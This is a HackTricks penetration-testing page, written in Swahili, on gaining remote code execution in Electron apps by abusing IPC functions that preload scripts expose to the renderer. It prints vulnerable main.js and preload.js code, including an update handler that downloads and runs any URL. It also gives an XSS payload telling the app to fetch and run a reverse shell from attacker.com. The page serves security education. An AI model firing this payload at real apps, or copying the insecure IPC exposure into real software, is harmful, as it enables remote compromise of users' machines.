Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Electron contextIsolation RCE via IPC

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa skripti ya kupakia inafunua kituo cha IPC kutoka kwenye faili ya main.js, mchakato wa renderer utaweza kufikia na ikiwa una kasoro, RCE inaweza kuwa inawezekana.

Mifano mingi hii ilitolewa hapa https://www.youtube.com/watch?v=xILfQGkLXQo. Angalia video kwa maelezo zaidi.

Mfano 0

Mfano kutoka https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21 (una mfano kamili wa jinsi MS Teams ilivyokuwa ikifanya udanganyifu kutoka XSS hadi RCE katika hizo slaidi, hii ni mfano wa msingi sana):

Mfano 1

Angalia jinsi main.js inavyosikiliza getUpdate na ita pakuwa na kutekeleza URL yoyote iliyopitishwa. Angalia pia jinsi preload.js inavyo funua tukio lolote la IPC kutoka kwa main.

// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
});

mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)

item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})

item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};

Kutumia:

<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>

Mfano 2

Ikiwa skripti ya kuiwezesha inafunua moja kwa moja kwa renderer njia ya kuita shell.openExternal ni rahisi kupata RCE

// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url);
};

Mfano 3

Ikiwa skripti ya kuiweka kabla inafunua njia za kuwasiliana kabisa na mchakato mkuu, XSS itaweza kutuma tukio lolote. Athari ya hii inategemea ni nini mchakato mkuu unafunua kuhusiana na IPC.

window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
};

window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousElectron contextIsolation RCE via Electron internal codeNextFlask

Last updated